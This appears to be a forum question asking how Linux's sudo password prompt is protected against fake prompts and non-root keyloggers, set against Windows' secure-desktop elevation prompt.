Security model of Linux password entry

Whenever a Windows application wants to do something requiring administrator privileges, my screen goes black and a prompt comes up, asking if I want to grant administrator privileges. I understand this security model: it relies on the user having control over the keyboard and mouse. Privileges go to whoever has control of input. If an application gains control of input while the security prompt is up, then it gains control of administrator privileges, even if it doesn't know my password.

In contrast, on Linux, the sudo command is the equivalent. When an application requests privileges, it prompts me to enter in my password. Thus, stealing input is insufficient to gain full privileges; an application must steal my password instead. However, I do not understand this model. It seems that this model just makes it easy to steal my credentials, because I am giving out my password constantly. What's stopping a malicious application from putting up a fake prompt and stealing my password, thus gaining privileges forever?

1. Is a security prompt bound in some way to the application that requests it?
2. If an application is able to impersonate a security prompt, or raise a security prompt while pretending to be another application, then is it assumed that the application already has full control of the computer and cannot raise its privileges by learning my password?
3. If I trust an application once, then is it ok for that application to steal my password?
4. Does Linux (theoretically) prevent non-root keyloggers, or can a non-root keylogger sniff my password even when I'm typing it into a legitimate security prompt?

I do not understand what stops a malicious unprivileged program from wrenching privileges from an administrator account. The security model could simply be that all programs run by an administrator are assumed to have access to root if they wish for it, and that administrators cannot rely on root/non-root being a meaningful barrier. Windows runs under this premise in practice. I can't tell if Linux tries to make any additional guarantees.